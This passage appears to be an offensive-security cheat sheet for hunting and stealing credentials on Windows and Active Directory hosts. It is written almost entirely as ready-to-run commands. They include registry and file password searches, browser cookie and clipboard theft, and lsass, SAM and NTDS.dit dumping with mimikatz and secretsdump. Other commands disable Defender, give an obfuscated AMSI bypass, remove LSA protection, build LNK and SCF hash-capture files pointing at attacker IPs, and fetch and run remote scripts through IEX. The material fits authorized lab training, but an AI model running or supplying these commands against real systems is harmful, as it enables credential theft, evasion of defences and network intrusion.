Here are some other places we should keep in mind when credential hunting:
Passwords in Group Policy in the SYSVOL share
Passwords in scripts in the SYSVOL share
Password in scripts on IT shares
Passwords in web.config files on dev machines and IT shares
Passwords in the AD user or computer description fields
KeePass databases --> pull hash, crack and get loads of access.
Found on user systems and shares
Files such as pass.txt, passwords.docx, passwords.xlsx found on user systems, shares,
Repositories:
Copy PS C:\\htb> start lazagne.exe all
PS C:\\htb> .\\SharpChrome.exe logins /unprotect Extract saved PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP credentials with SessionGopher
Copy PS C:\\htb> Import-Module .\\SessionGopher.ps1
PS C:\\Tools> Invoke-SessionGopher -Target WINLPE-SRV01 Sniff passwords and hashes with net-creds
Copy Intrusionz3r0@htb[/htb]$ sudo python net-creds.py
Intrusionz3r0@htb[/htb]$ sudo python net-creds.py -i eth0 Search credentials on the registry
Copy REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials
reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s Passwords in unattend.xml
Copy C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml Credentials on CMDKey
Copy #Listing Saved Credentials
C:\\htb> cmdkey /list PowerShell History File
Copy type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw Powershell Transcript
Copy C:\Users\<USERNAME>\Documents\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt
C:\Transcripts\<DATE>\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt Password in Alternate Data Stream
Copy PS > Get-Item -path flag.txt -Stream *
PS > Get-Content -path flag.txt -Stream Flag
IIS Web config
Copy Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue Stealing cookies Firefox
Copy #**Path:** %APPDATA%\\Mozilla\\Firefox\\Profiles\\<RANDOM>.default-release
Intrusionz3r0@htb[/htb]$ python3 cookieextractor.py --dbpath "cookies.sqlite" --host slack --cookie d Stealing cookies Chromium
Copy #**Path:** %LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Network\\Cookies
PS C:\\htb> IEX(New-Object Net.WebClient).DownloadString('<https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSh>
arpPack/master/PowerSharpBinaries/Invoke-SharpChromium.ps1')
PS C:\\htb> copy "$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Network\\Cookies" "$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Cookies"
PS C:\\htb> Invoke-SharpChromium -Command "cookies slack.com" Get Clipboard data
Copy PS C:\\htb> IEX(New-Object Net.WebClient).DownloadString('<https://raw.githubusercontent.com/inguardians/Invoke-Clipboard/master/Invoke-Clipboard.ps1>')
PS C:\\htb> Invoke-ClipboardLogger Retrieve Putty Credentials from registry
Copy PS C:\\htb> reg query HKEY_CURRENT_USER\\SOFTWARE\\SimonTatham\\PuTTY\\Sessions
PS C:\\htb> reg query HKEY_CURRENT_USER\\SOFTWARE\\SimonTatham\\PuTTY\\Sessions\\<value> Retrieve password from Wireless
Copy C:\\htb> netsh wlan show profile
C:\\htb> netsh wlan show profile <ssid-name> key=clear
cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on Search for file contents
Copy cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config 2>nul >> results.txt
findstr /spin "password" *.*
dir | select-string "password"
PS C:\\htb> Get-ChildItem -Path C:\\PSTranscripts -Force -Recurse -Include *.txt, *.cfg, *.conf, *.xml, *.ini -Exclude "Windows","Documents*", "Program F*" -ErrorAction SilentlyContinue
PS C:\\htb> Get-ChildItem -Path "C:\\Users" -Recurse -File | Select-String -Pattern "password" | Select-Object FileName, LineNumber, Line Search for filename
Copy dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
C:\\htb> dir \\confidentials.txt /s /p
PS C:\\htb> Get-ChildItem -Path C:\\ -Filter "confidentials.txt" -Recurse Chrome Dictionary Files
Copy PS C:\\htb> Get-Content 'C:\\Users\\htb-student\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Custom Dictionary.txt' | Select-String password Create a malicious lnk file to steal NTLMv2 hashes
Copy Intrusionz3r0@htb[/htb]$ python3 .\\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows Sticky notes
Copy #Path: C:\\Users\\<user>\\AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState\\plum.sqlite
Intrusionz3r0@htb[/htb]$ sqlite3 plum.sqlite "select Text from Note;"
Intrusionz3r0@htb[/htb]$ strings plum.sqlite-wal
PS C:\\htb> Set-ExecutionPolicy Bypass -Scope Process
PS C:\\htb> cd .\\PSSQLite\\
PS C:\\htb> Import-Module .\\PSSQLite.psd1
PS C:\\htb> $db = 'C:\\Users\\htb-student\\AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState\\plum.sqlite'
PS C:\\htb> Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | ft -wrap Recover credentials on PowerShell scripts
First Option:
Copy PS C:\\htb> $credential = Import-Clixml -Path 'C:\\scripts\\pass.xml'
PS C:\\htb> $credential.GetNetworkCredential().username
PS C:\\htb> $credential.GetNetworkCredential().password
Str0ng3ncryptedP@ss! Second Option
Copy $user = "Administrator"
$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367" | ConvertTo-SecureString
cred = New-Object System.Management.Automation.PSCredential($user, $pass)
$cred.GetNetworkCredential() | Format-List
Monitoring for Process Command Lines
Copy PS C:\\htb> IEX (iwr '<http://10.10.10.205/procmon.ps1>')
while($true)
{
$process = Get-WmiObject Win32_Process | Select-Object CommandLine
Start-Sleep 1
$process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
Compare-Object -ReferenceObject $process -DifferenceObject $process2
} Capture NTLMv2 through SCF files on windows
Copy [Shell]
Command=2
IconFile=\\\\10.10.14.3\\share\\legit.ico
[Taskbar]
Command=ToggleDesktop Generate Malicious Lnk files
Copy $objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\\legit.lnk")
$lnk.TargetPath = "\\\\<attackerIP>\\@pwn.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\\system32\\shell32.dll, 3"
$lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save() Copying SAM SYSTEM and Security
Copy C:\\WINDOWS\\system32> reg.exe save hklm\\sam C:\\sam.save
C:\\WINDOWS\\system32> reg.exe save hklm\\system C:\\system.save
C:\\WINDOWS\\system32> reg.exe save hklm\\security C:\\security.save Dumping SAM and SYSTEM
Copy Intrusionz3r0X@htb[/htb]$ impacket-reg domain/domuser:'Password'@192.168.210.16 save -keyName 'HKLM\SYSTEM' -o '\\10.10.14.3\smbfolder'
Intrusionz3r0X@htb[/htb]$ impacket-secretsdump -sam sam.save -system system.save LOCAL
Intrusionz3r0X@htb[/htb]$ netexec smb 10.129.202.85 -u jmarston -p P@ssword! --sam Dump LSA
Copy Intrusionz3r0X@htb[/htb]$ netexec smb 10.129.202.85 -u jmarston -p P@ssword! --lsa Dump lsass
Copy
#Finding LSASS PID in cmd
C:\\Windows\\system32> tasklist /svc
#Finding LSASS PID in Powershell
PS C:\\Windows\\system32> Get-Process lsass
#----------------------------------------
#Create lssas file
PS C:\\Windows\\system32> rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 672 C:\\lsass.dmp full
#dump the lsass.dmp file.
Intrusionz3r0X@htb[/htb]$ pypykatz lsa minidump /home/peter/Documents/lsass.dmp
C:\\Windows\\system32> .\\mimikatz.exe privilege::debug "sekurlsa::logonpasswords full" exit
Dump lsass using RDP session
Dump NTDS.dit
To make a copy of the NTDS.dit file, we need local admin (Administrators group) or Domain Admin (Domain Admins group) (or equivalent) rights.
Copy
#List the localgroups
C:\\> net localgroup
#Check user permission.
C:\\> net user bwilliamson
#Check the shadow copy
C:\\> vssadmin CREATE SHADOW /For=C:
#Move the file.
C:\\> cmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\Windows\\NTDS\\NTDS.dit c:\\NTDS\\NTDS.dit
#Extracting Credentials from NTDS.dit
PS C:\\htb> Import-Module .\\DSInternals.psd1
PS C:\\htb> $key = Get-BootKey -SystemHivePath .\\SYSTEM
PS C:\\htb> Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\\ntds.dit -BootKey $key
#Extracting Hashes Using SecretsDump
Intrusionz3r0@htb[/htb]$ secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
# Fastest way to steal the NTDS.
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.129.201.57 -u bwilliamson -p P@55w0rd! --ntds
Mimikatz
Execute a PowerShell as Administrator, create an exclusion Path and disable AV.
Copy PS C:\Users\maldev > Start-Process PowerShell_ISE -Verb RunAS
PS C:\Users\maldev > Add-MpPreference -ExclusionPath “C:\Temp”
PS C:\Users\maldev > Set-MpPreference -DisableRealTimeMonitoring $true
PS C:\Users\maldev > Import-Module C:\Temp\Invoke-Mimikatz.ps1 AMSI Bypass
Copy PS C:\Users\maldev > S`eT-It`em ( ‘V’+’aR’ + ‘IA’ + (‘blE:1’+’q2') + (‘uZ’+’x’) ) ( [TYpE]( “{1}{0}”-F’F’,’rE’ ) ) ; ( Get-varI`A`BLE ( (‘1Q’+’2U’) +’zX’ ) -VaL ).”A`ss`Embly”.”GET`TY`Pe”(( “{6}{3}{1}{4}{2}{0}{5}” -f(‘Uti’+’l’),’A’,(‘Am’+’si’),(‘.Man’+’age’+’men’+’t.’),(‘u’+’to’+’mation.’),’s’,(‘Syst’+’em’) ) ).”g`etf`iElD”( ( “{0}{2}{1}” -f(‘a’+’msi’),’d’,(‘I’+’nitF’+’aile’) ),( “{2}{4}{0}{1}{3}” -f (‘S’+’tat’),’i’,(‘Non’+’Publ’+’i’),’c’,’c,’ )).”sE`T`VaLUE”( ${n`ULl},${t`RuE} ) Disable LSA Protection with mimikatz
Copy !+
!processprotect /process:lsass.exe /remove
privilege::debug
sekurlsa::logonpasswords
Copy vault::cred #dump Credential Manager
lsadump::sam #dump the SAM
lsadump::cache #dump cached Domain credentials (these must be cracked, PTH doesn't work on mscache) 
